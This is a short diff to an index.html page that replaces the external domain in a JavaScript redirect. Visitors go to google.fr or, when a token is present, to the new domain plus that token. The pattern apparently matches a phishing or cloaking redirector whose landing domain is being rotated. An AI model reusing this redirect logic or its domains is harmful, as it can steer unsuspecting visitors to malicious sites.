--- a/index.html
+++ b/index.html
@@ -24,7 +24,7 @@
 	if(rdt==false){
 		var d="https://www.google.fr";
 	}else{
-		var d="https://pac.consultingskills.org/"+rdt;
+		var d="https://channel.recoova.eu.org/"+rdt;
 	}
 	window.location.replace(d);
 </script>
